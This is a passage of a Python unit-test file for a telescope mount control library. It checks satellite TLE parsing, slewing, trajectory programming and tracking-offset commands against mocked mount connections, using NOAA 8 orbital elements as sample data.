UTC2TT = 69
ts = load.timescale()
trajectoryParams = TrajectoryParams(obsSite=ObsSite())
trajectoryParams.jdStart = '100'
assert trajectoryParams.jdStart.tt == 169
def test_TP_jdEnd_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.jdEnd = None
assert trajectoryParams.jdEnd is None
def test_TP_jdEnd_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
trajectoryParams = TrajectoryParams(obsSite=ObsSite())
trajectoryParams.jdEnd = '100'
assert trajectoryParams.jdEnd.tt == 169
def test_TR_message_1(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.message = None
assert trajectoryParams.message is None
def test_TR_message_2(self):
trajectoryParams = TrajectoryParams()
trajectoryParams.message = 'test'
assert trajectoryParams.message == 'test'
def test_parseGetTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
suc = sat.parseGetTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.name, 'NOAA 8 [-]')
self.assertEqual(sat.tleParams.l0, t0)
self.assertEqual(sat.tleParams.l1, t1)
self.assertEqual(sat.tleParams.l2, t2)
def test_parseGetTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['76129888407$0A']
suc = sat.parseGetTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.name, None)
self.assertEqual(sat.tleParams.l0, None)
self.assertEqual(sat.tleParams.l1, None)
self.assertEqual(sat.tleParams.l2, None)
def test_parseGetTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['76129888407$0A', ['hj']]
suc = sat.parseGetTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.name, None)
self.assertEqual(sat.tleParams.l0, None)
self.assertEqual(sat.tleParams.l1, None)
self.assertEqual(sat.tleParams.l2, None)
def test_getTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, response, 1
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 1
suc = sat.getTLE()
self.assertTrue(suc)
def test_getTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
cont = '$0A'
response = [t0 + cont + t1 + cont + t2 + cont]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 2
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.getTLE()
self.assertFalse(suc)
def test_getTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, ['V', 'V'], 2
suc = sat.getTLE()
self.assertFalse(suc)
def test_setTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE()
self.assertFalse(suc)
def test_setTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertTrue(suc)
def test_setTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407x'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996x'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'V', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_8(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_setTLE_9(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
t0 = 'NOAA 8 [-] '
t1 = '1 13923U 83022A 19185.92877216 -.00000021 00000-0 89876-5 0 9996'
t2 = '2 13923 98.5823 170.9975 0016143 125.4216 234.8476 14.28676129888407'
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 2
suc = sat.setTLE(line0=t0,
line1=t1,
line2=t2)
self.assertFalse(suc)
def test_parseCalcTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseCalcTLE(response, 1)
self.assertFalse(suc)
def test_parseCalcTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = []
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['E', 'E', 'E']
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = 'F'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertTrue(suc)
def test_parseCalcTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertTrue(suc)
def test_parseCalcTLE_8(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = 'E'
s1 = ''
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_9(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = 'E'
s2 = ''
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_10(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = 'E'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_11(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = ''
s1 = ''
s2 = ''
response = [s0, s1, s2, s2]
suc = sat.parseCalcTLE(response, 4)
self.assertFalse(suc)
def test_parseCalcTLE_12(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345'
s2 = 'N'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_parseCalcTLE_13(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = 'F,s'
response = [s0, s1, s2]
suc = sat.parseCalcTLE(response, 3)
self.assertFalse(suc)
def test_calcTLE_0(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.calcTLE(julD=julD)
self.assertFalse(suc)
def test_calcTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'V', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 1
suc = sat.calcTLE(julD=1234567.8)
self.assertFalse(suc)
def test_calcTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE(julD=1234567.8)
self.assertTrue(suc)
def test_calcTLE_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE()
self.assertFalse(suc)
def test_calcTLE_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
s0 = '+23.12334,123.1234'
s1 = '12.12345,+12.1234'
s2 = '12345678.1, 12345678.2, F'
response = [s0, s1, s2]
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, response, 3
suc = sat.calcTLE(julD=1234567.8, duration=0)
self.assertFalse(suc)
def test_getCoordsFromTLE_0(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
suc = sat.getCoordsFromTLE()
self.assertFalse(suc)
def test_getCoordsFromTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
ts = load.timescale()
julD = ts.tt_jd(1234567.8)
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.getCoordsFromTLE(julD=julD)
self.assertFalse(suc)
def test_getCoordsFromTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['E', 'E']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['10.0, 10.0', 'E']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertFalse(suc)
def test_getCoordsFromTLE_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ['10.0, 10.0', '10.0, 10.0']
ret = (True, response, 2)
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = ret
suc = sat.getCoordsFromTLE(julD=1234567.8)
self.assertTrue(suc)
def test_slewTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc, mes = sat.slewTLE()
self.assertFalse(suc)
def test_slewTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'X', 1
suc, mes = sat.slewTLE()
self.assertTrue(suc)
self.assertEqual(mes, 'Error')
def test_slewTLE_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 1
suc, mes = sat.slewTLE()
self.assertTrue(suc)
self.assertEqual(mes, 'Slewing to start and track')
def test_slewTLE_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'V', 2
suc, mes = sat.slewTLE()
self.assertFalse(suc)
def test_parseStatTLE_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseStatTLE(response, 3)
self.assertFalse(suc)
def test_parseStatTLE_2(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ''
suc = sat.parseStatTLE(response, 1)
self.assertFalse(suc)
def test_parseStatTLE_3(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['']
suc = sat.parseStatTLE(response, 1)
self.assertFalse(suc)
self.assertEqual(sat.tleParams.message, None)
def test_parseStatTLE_4(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['X']
suc = sat.parseStatTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.message, 'Error')
def test_parseStatTLE_5(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['V']
suc = sat.parseStatTLE(response, 1)
self.assertTrue(suc)
self.assertEqual(sat.tleParams.message, 'Slewing to the start of the transit')
def test_parseStatTLE_6(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
response = ['V', 'E']
suc = sat.parseStatTLE(response, 2)
self.assertFalse(suc)
def test_statTLE_1(self):
class Parent:
obsSite = None
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = False, 'E', 1
suc = sat.statTLE()
self.assertFalse(suc)
def test_statTLE_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch('mountcontrol.satellite.Connection') as mConn:
mConn.return_value.communicate.return_value = True, 'E', 1
suc = sat.statTLE()
self.assertTrue(suc)
def test_startProgTrajectory_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory()
assert not suc
def test_startProgTrajectory_2(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_3(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_4(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V', 'V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_5(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['E'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert not suc
def test_startProgTrajectory_6(self):
ts = load.timescale()
julD = ts.tt_jd(12345678)
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.startProgTrajectory(julD=julD)
assert suc
def test_progTrajectoryData_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory()
assert not suc
def test_progTrajectoryData_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 1)
alt = [10, 20, 30]
az = [40, 50]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['1', '2'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2'], 1)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2'], 2)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2', 'E'], 3)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert not suc
def test_progTrajectoryData_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['1', '2', '3'], 3)
alt = [10, 20, 30]
az = [40, 50, 60]
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.progTrajectory(alt=alt, az=az)
assert suc
def test_calcTrajectory_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (False, ['V'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory(replay=True)
assert not suc
def test_calcTrajectory_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['V', 'V'], 2)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_5(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['E'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_6(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['10, 10, F, F'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert not suc
def test_calcTrajectory_7(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
val = (True, ['10, 10, F'], 1)
with mock.patch.object(Connection,
'communicate',
return_value=val):
suc = sat.calcTrajectory()
assert suc
def test_getTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3], 1)):
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3], 3)):
suc = sat.getTrackingOffsets()
self.assertFalse(suc)
def test_getTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 4)):
suc = sat.getTrackingOffsets()
self.assertTrue(suc)
def test_setTrackingOffsets_1(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(False, [1, 2, 3, 4], 4)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_2(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, [1, 2, 3, 4], 1)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_3(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
obsSite = ObsSite()
sat = Satellite(parent=Parent())
with mock.patch.object(Connection,
'communicate',
return_value=(True, ['E', 2, 3], 3)):
suc = sat.setTrackingOffsets(RA=1, DEC=1, DECcorr=1, Time=1)
self.assertFalse(suc)
def test_setTrackingOffsets_4(self):
class ObsSite:
UTC2TT = 69
ts = load.timescale()
class Parent:
